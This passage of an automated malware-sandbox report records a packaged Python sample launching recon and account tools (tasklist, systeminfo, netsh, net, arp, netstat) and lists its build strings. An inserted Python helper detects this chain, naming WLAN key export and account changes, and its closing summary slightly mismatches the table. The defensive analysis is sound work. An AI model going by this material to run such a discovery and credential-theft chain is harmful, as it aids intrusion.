            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll, uxtheme.dll, vcruntime140.dll, vcruntime140_1.dll, amsi.dll, userenv.dll, profapi.dll, vbscript.dll, sxs.dll
            Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll, fsutilext.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll, mpr.dll, framedynos.dll, dbghelp.dll, sspicli.dll, srvcli.dll, netutils.dll, sspicli.dll, kernel.appcore.dll, wbemcomn.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll, mpr.dll, framedynos.dll, dbghelp.dll, sspicli.dll, srvcli.dll, netutils.dll, sspicli.dll, kernel.appcore.dll, wbemcomn.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll
            Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll, fsutilext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, edputil.dll
            Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll, fsutilext.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll, ifmon.dll, iphlpapi.dll, mprapi.dll, rasmontr.dll, rasapi32.dll, fwpuclnt.dll, rasman.dll, mfc42u.dll, rasman.dll, authfwcfg.dll, fwpolicyiomgr.dll, firewallapi.dll, dnsapi.dll, fwbase.dll, dhcpcmonitor.dll, dot3cfg.dll, dot3api.dll, onex.dll, eappcfg.dll, ncrypt.dll, eappprxy.dll, ntasn1.dll, fwcfg.dll, hnetmon.dll, netshell.dll, nlaapi.dll, netsetupapi.dll, netiohlp.dll, dhcpcsvc.dll, winnsi.dll, nettrace.dll, sspicli.dll, nshhttp.dll, httpapi.dll, nshipsec.dll, userenv.dll, activeds.dll, polstore.dll, winipsec.dll, adsldpc.dll, nshwfp.dll, cabinet.dll, p2pnetsh.dll, p2p.dll, profapi.dll, cryptbase.dll, rpcnsh.dll, wcnnetsh.dll, wlanapi.dll, whhelper.dll, winhttp.dll, wlancfg.dll, cryptsp.dll, wshelper.dll, wevtapi.dll, mswsock.dll, wwancfg.dll, wwapi.dll, wcmapi.dll, rmclient.dll, mobilenetworking.dll, peerdistsh.dll, uxtheme.dll, slc.dll, sppc.dll, gpapi.dll, ktmw32.dll, mprmsg.dll, windows.storage.dll, wldp.dll, msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, wbemcomn.dll, kernel.appcore.dll, userenv.dll, sspicli.dll, ntmarta.dll, esscli.dll
            Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: mswsock.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, dnsapi.dll, winrnr.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll, framedynos.dll, sspicli.dll, kernel.appcore.dll, wbemcomn.dll, msxml6.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, uxtheme.dll, vcruntime140.dll, vcruntime140_1.dll, amsi.dll, userenv.dll, profapi.dll, vbscript.dll, sxs.dll
            Source: C:\Windows\System32\net.exe Section loaded: mpr.dll, wkscli.dll, netutils.dll, samcli.dll, srvcli.dll, iphlpapi.dll
            Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll, netutils.dll, dsrole.dll, srvcli.dll, wkscli.dll, logoncli.dll, cryptbase.dll, cscapi.dll, samlib.dll
            Source: C:\Windows\System32\query.exe Section loaded: regapi.dll
            Source: C:\Windows\System32\quser.exe Section loaded: winsta.dll, utildll.dll, samcli.dll, netutils.dll
            Source: C:\Windows\System32\net.exe Section loaded: mpr.dll, wkscli.dll, netutils.dll, samcli.dll, srvcli.dll, iphlpapi.dll
            Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll, netutils.dll, dsrole.dll, srvcli.dll, wkscli.dll, logoncli.dll, cryptbase.dll, cscapi.dll, samlib.dll
            Source: C:\Windows\System32\net.exe Section loaded: mpr.dll, wkscli.dll, netutils.dll, samcli.dll, srvcli.dll, iphlpapi.dll
            Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll, netutils.dll, dsrole.dll, srvcli.dll, wkscli.dll, logoncli.dll, cryptbase.dll, samlib.dll
            Source: C:\Windows\System32\net.exe Section loaded: mpr.dll, wkscli.dll, netutils.dll, samcli.dll, srvcli.dll, iphlpapi.dll
            Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll, netutils.dll, dsrole.dll, srvcli.dll, wkscli.dll, logoncli.dll, cryptbase.dll, samlib.dll
            Source: C:\Windows\System32\net.exe Section loaded: mpr.dll, wkscli.dll, netutils.dll, samcli.dll, srvcli.dll, iphlpapi.dll
            Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll, netutils.dll, dsrole.dll, srvcli.dll, wkscli.dll, logoncli.dll, cryptbase.dll, samlib.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll, framedynos.dll, sspicli.dll, kernel.appcore.dll, wbemcomn.dll, msxml6.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, uxtheme.dll, vcruntime140.dll, vcruntime140_1.dll, amsi.dll, userenv.dll, profapi.dll, vbscript.dll, sxs.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll, mpr.dll, framedynos.dll, dbghelp.dll, sspicli.dll, srvcli.dll, netutils.dll, sspicli.dll, kernel.appcore.dll, wbemcomn.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll
            Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll, dhcpcsvc.dll, dhcpcsvc6.dll, dnsapi.dll, winnsi.dll
            Source: C:\Windows\System32\ROUTE.EXE Section loaded: iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll
            Source: C:\Windows\System32\ARP.EXE Section loaded: snmpapi.dll, iphlpapi.dll, inetmib1.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll
            Source: C:\Windows\System32\NETSTAT.EXE Section loaded: iphlpapi.dll, snmpapi.dll, inetmib1.dll, mswsock.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll, ifmon.dll, iphlpapi.dll, mprapi.dll, rasmontr.dll, rasapi32.dll, fwpuclnt.dll, rasman.dll, mfc42u.dll, rasman.dll, authfwcfg.dll, fwpolicyiomgr.dll, firewallapi.dll, dnsapi.dll, fwbase.dll, dhcpcmonitor.dll, dot3cfg.dll, dot3api.dll, onex.dll, eappcfg.dll, ncrypt.dll, eappprxy.dll, ntasn1.dll, fwcfg.dll, hnetmon.dll, netshell.dll, nlaapi.dll, netsetupapi.dll, netiohlp.dll, dhcpcsvc.dll, winnsi.dll, nettrace.dll, sspicli.dll, nshhttp.dll, httpapi.dll, nshipsec.dll, userenv.dll, activeds.dll, polstore.dll, winipsec.dll, adsldpc.dll, nshwfp.dll, cabinet.dll, p2pnetsh.dll, p2p.dll, profapi.dll, cryptbase.dll, rpcnsh.dll, wcnnetsh.dll, wlanapi.dll, whhelper.dll, winhttp.dll, wlancfg.dll, cryptsp.dll, wshelper.dll, wevtapi.dll, mswsock.dll, wwancfg.dll, wwapi.dll, wcmapi.dll, rmclient.dll, mobilenetworking.dll, peerdistsh.dll, uxtheme.dll, slc.dll, sppc.dll, gpapi.dll, ktmw32.dll, mprmsg.dll, windows.storage.dll, wldp.dll, msasn1.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll, ifmon.dll, iphlpapi.dll, mprapi.dll, rasmontr.dll, rasapi32.dll, rasman.dll, fwpuclnt.dll, rasman.dll, mfc42u.dll, authfwcfg.dll, fwpolicyiomgr.dll, firewallapi.dll, dnsapi.dll, fwbase.dll
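The module-load rows above are the raw material for a quick LOLBin triage, but they are awkward to read by eye. The Python script below is an added helper (not part of the Joe Sandbox report or of the analysed sample) that groups such rows into per-launch module lists and scores the discovery/credential/account chain they reveal. Its input rows are constructed from the table above in the fused form the page extraction produced; the tool buckets and the four-tool threshold are this example's own assumptions. One caveat it encodes: netsh.exe loads every registered helper DLL at start-up, so wlanapi.dll or authfwcfg.dll in its list does not by itself prove that a `netsh wlan` or `netsh advfirewall` sub-command ran; the process command line recorded elsewhere in the report does.

```python
"""Triage helper for Joe Sandbox "Section loaded" rows.

Added example; not part of the Joe Sandbox report or of the analysed sample.
Rows are grouped into per-launch module lists and the LOLBin chain is scored.
SAMPLE is constructed from the report in the fused form the page extraction
produced ("...exeSection loaded: ..."); the parser also accepts a space before
"Section loaded:" and a comma-separated module list on one row.
"""
import re
from collections import Counter

SAMPLE = """\
Source: C:\\Windows\\System32\\wbem\\WMIC.exeSection loaded: vbscript.dll
Source: C:\\Windows\\System32\\tasklist.exeSection loaded: version.dll
Source: C:\\Windows\\System32\\tasklist.exeSection loaded: sspicli.dll
Source: C:\\Windows\\System32\\tasklist.exeSection loaded: sspicli.dll
Source: C:\\Windows\\System32\\tasklist.exeSection loaded: version.dll
Source: C:\\Windows\\System32\\tasklist.exeSection loaded: winsta.dll
Source: C:\\Windows\\System32\\netsh.exeSection loaded: wlanapi.dll
Source: C:\\Windows\\System32\\netsh.exeSection loaded: authfwcfg.dll
Source: C:\\Windows\\System32\\net1.exeSection loaded: samlib.dll
Source: C:\\Windows\\System32\\ARP.EXESection loaded: inetmib1.dll
Source: C:\\Windows\\System32\\NETSTAT.EXE Section loaded: iphlpapi.dll, snmpapi.dll
Source: C:\\Windows\\System32\\HOSTNAME.EXESection loaded: dnsapi.dll
"""

LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.(?:exe|com))\s*Section loaded:\s*(?P<mods>.+?)\s*$",
    re.IGNORECASE,
)

# Buckets and threshold are this example's assumptions, built from the
# binaries the report shows the sample spawning.
DISCOVERY = {"systeminfo.exe", "tasklist.exe", "hostname.exe", "ipconfig.exe",
             "route.exe", "arp.exe", "netstat.exe", "query.exe", "quser.exe", "wmic.exe"}
NETSH = {"netsh.exe"}              # WLAN profile/key export and firewall changes
ACCOUNT = {"net.exe", "net1.exe"}  # local account / password changes
RECON_THRESHOLD = 4                # distinct discovery tools before calling it a burst


def parse_runs(text):
    """Return [(process, [module, ...]), ...], one entry per launch.

    Consecutive rows for the same image belong to one launch until the first
    module of that launch shows up again: the table lists loads in order of
    occurrence (assumed from the report layout), so a repeat of the first DLL
    is a fresh process. Repeats of any other DLL (sspicli.dll twice inside one
    tasklist.exe run) stay inside the launch.
    """
    runs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proc = m.group("proc").replace("/", "\\").rsplit("\\", 1)[-1].lower()
        for mod in (x.strip().lower() for x in m.group("mods").split(",")):
            if not mod:
                continue
            if runs and runs[-1][0] == proc and mod != runs[-1][1][0]:
                runs[-1][1].append(mod)
            else:
                runs.append((proc, [mod]))
    return runs


def modules_of(runs, proc):
    """Union of modules loaded across every launch of `proc`, sorted."""
    return sorted({m for p, mods in runs for m in mods if p == proc})


def summarize(runs):
    """Count launches per image and flag the chain a stealer typically runs."""
    launches = Counter(p for p, _ in runs)
    discovery = sorted(p for p in launches if p in DISCOVERY)
    flags = []
    if len(discovery) >= RECON_THRESHOLD:
        flags.append(f"discovery burst ({len(discovery)} tools)")
    if any(p in NETSH for p in launches):
        # netsh loads every registered helper DLL (wlancfg.dll, authfwcfg.dll,
        # p2pnetsh.dll, ...) at start-up, so its module list cannot tell
        # "netsh wlan" from "netsh advfirewall"; the command line can.
        flags.append("netsh launched: check the command line for wlan/advfirewall use")
    if any(p in ACCOUNT for p in launches):
        flags.append("net/net1 launched: possible local account change")
    return {"launches": dict(launches), "discovery_tools": discovery, "flags": flags}


if __name__ == "__main__":
    runs = parse_runs(SAMPLE)
    for proc, mods in runs:
        print(f"{proc:14} {len(mods):3} modules")
    for flag in summarize(runs)["flags"]:
        print("!", flag)
```

Feed it the whole "Section loaded" table rather than the twelve constructed rows and the launch counter alone reproduces the picture the report's signatures paint: five net.exe/net1.exe pairs, three netsh.exe runs, and the full hostname/ipconfig/route/arp/netstat/tasklist/systeminfo recon set.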
            Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\Desktop\pyvenv.cfg
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe Static file information: File size 9934907 > 1048576
            Source: Binary string: C:\A\34\b\bin\amd64\_sqlite3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458402101.00007FFDA3AE1000.00000040.00000001.01000000.0000000D.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\select.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460538535.00007FFDA5491000.00000040.00000001.01000000.0000000A.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdbMM source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457809177.00007FFDA36FB000.00000040.00000001.01000000.0000000C.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_bz2.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459049746.00007FFDA4161000.00000040.00000001.01000000.0000000B.sdmp
            Source: Binary string: cryptography_rust.pdbc source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: Binary string: C:\A\34\b\bin\amd64\sqlite3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp
            Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457000685.00007FFDA3435000.00000040.00000001.01000000.00000011.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_hashlib.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2456611424.00007FFDA32F1000.00000040.00000001.01000000.00000015.sdmp
            Source: Binary string: :C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.pdb source: powershell.exe, 00000051.00000002.2305154049.00000260C2523000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: crypto\bn\bn_ctx.cBN_CTX_startBN_CTX_getossl_ec_group_new_excrypto\ec\ec_lib.cEC_GROUP_copyEC_GROUP_set_generatorEC_GROUP_set_curveEC_GROUP_get_curveEC_GROUP_get_degreeEC_GROUP_check_discriminantEC_POINT_newEC_POINT_copyEC_POINT_set_to_infinityEC_POINT_set_Jprojective_coordinates_GFpEC_POINT_set_affine_coordinatesEC_POINT_get_affine_coordinatesEC_POINT_addEC_POINT_dblEC_POINT_invertEC_POINT_is_at_infinityEC_POINT_is_on_curveEC_POINT_cmpEC_POINT_mulEC_GROUP_get_trinomial_basisEC_GROUP_get_pentanomial_basisgroup_new_from_nameossl_ec_group_set_paramsencodingdecoded-from-explicitEC_GROUP_new_from_paramsgeneratorcrypto\evp\digest.cevp_md_ctx_new_exevp_md_ctx_free_algctxevp_md_init_internalEVP_DigestUpdatesizeEVP_DigestFinal_exassertion failed: mdsize <= EVP_MAX_MD_SIZEEVP_DigestFinalXOFxoflenEVP_MD_CTX_copy_exEVP_MD_CTX_ctrlmicalgssl3-msblocksizexofalgid-absentevp_md_from_algorithmupdatecrypto\evp\m_sigver.cUNDEFdo_sigver_initEVP_DigestSignUpdateEVP_DigestVerifyUpdateEVP_DigestSignFinalEVP_DigestSignEVP_DigestVerifyFinalEVP_DigestVerifycompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.3.2built on: Fri Oct 18 00:15:00 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
            Source: Binary string: ossl_ec_GFp_simple_group_set_curvecrypto\ec\ecp_smpl.cossl_ec_GFp_simple_group_check_discriminantossl_ec_GFp_simple_point_set_affine_coordinatesossl_ec_GFp_simple_point_get_affine_coordinatesossl_ec_GFp_simple_make_affineossl_ec_GFp_simple_points_make_affineossl_ec_GFp_simple_field_invossl_ec_GFp_simple_blind_coordinatescrypto\user\tb_digest.cuser_get_digestcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_socket.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459264735.00007FFDA4331000.00000040.00000001.01000000.00000009.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_ctypes.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458028141.00007FFDA3711000.00000040.00000001.01000000.00000007.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457809177.00007FFDA36FB000.00000040.00000001.01000000.0000000C.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_asyncio.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458199558.00007FFDA3A81000.00000040.00000001.01000000.00000012.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\python3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440853445.0000018B46A80000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-1_1"not available source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: d:\a01\_work\4\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119754812.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460318251.00007FFDA5471000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_ssl.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457310056.00007FFDA3531000.00000040.00000001.01000000.0000000F.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_overlapped.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459813174.00007FFDA4DA1000.00000040.00000001.01000000.00000013.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\python310.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454057077.00007FFD943CE000.00000040.00000001.01000000.00000004.sdmp
            Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457000685.00007FFDA3435000.00000040.00000001.01000000.00000011.sdmp
            Source: Binary string: :C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.pdbhP source: powershell.exe, 00000051.00000002.2305154049.00000260C2523000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_queue.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458841393.00007FFDA3FD1000.00000040.00000001.01000000.00000023.sdmp
            Source: Binary string: cryptography_rust.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_uuid.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459552942.00007FFDA4631000.00000040.00000001.01000000.0000001D.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\unicodedata.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2448990282.00007FFD93CFB000.00000040.00000001.01000000.00000017.sdmp
            Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD94064460 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FFD94064460
            Source: VCRUNTIME140.dll.0.dr Static PE information: section name: _RDATA
            Source: libffi-7.dll.0.dr Static PE information: section name: UPX2
            Source: _rust.pyd.0.dr Static PE information: section name: UPX2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6C31 push r10; ret 2_2_00007FFD93BF6C33
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6F42 push r12; ret 2_2_00007FFD93BF6F5A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6E54 push rdi; iretd 2_2_00007FFD93BF6E56
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6EE0 push r12; ret 2_2_00007FFD93BF6EFE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6CFA push rdx; ret 2_2_00007FFD93BF6D01
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF77FA push rsi; ret 2_2_00007FFD93BF7831
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BFA2F5 push rsp; retf 2_2_00007FFD93BFA2F6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF92F4 push r10; retf 2_2_00007FFD93BF9360
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6E0B push rsp; ret 2_2_00007FFD93BF6E13
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6D06 push r12; ret 2_2_00007FFD93BF6D08
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF9C12 push rsp; retf 2_2_00007FFD93BF9C13
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF8F0E push r12; ret 2_2_00007FFD93BF8F35
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6EAB push rsi; ret 2_2_00007FFD93BF6EAC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6F9D push r10; ret 2_2_00007FFD93BF6FB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BFA4B9 push rdx; ret 2_2_00007FFD93BFA510
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF85B7 push r12; ret 2_2_00007FFD93BF85F3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF91B3 push rdi; iretd 2_2_00007FFD93BF91B5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6EC6 push r10; retf 2_2_00007FFD93BF6EC9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6CDC push r8; ret 2_2_00007FFD93BF6CE9
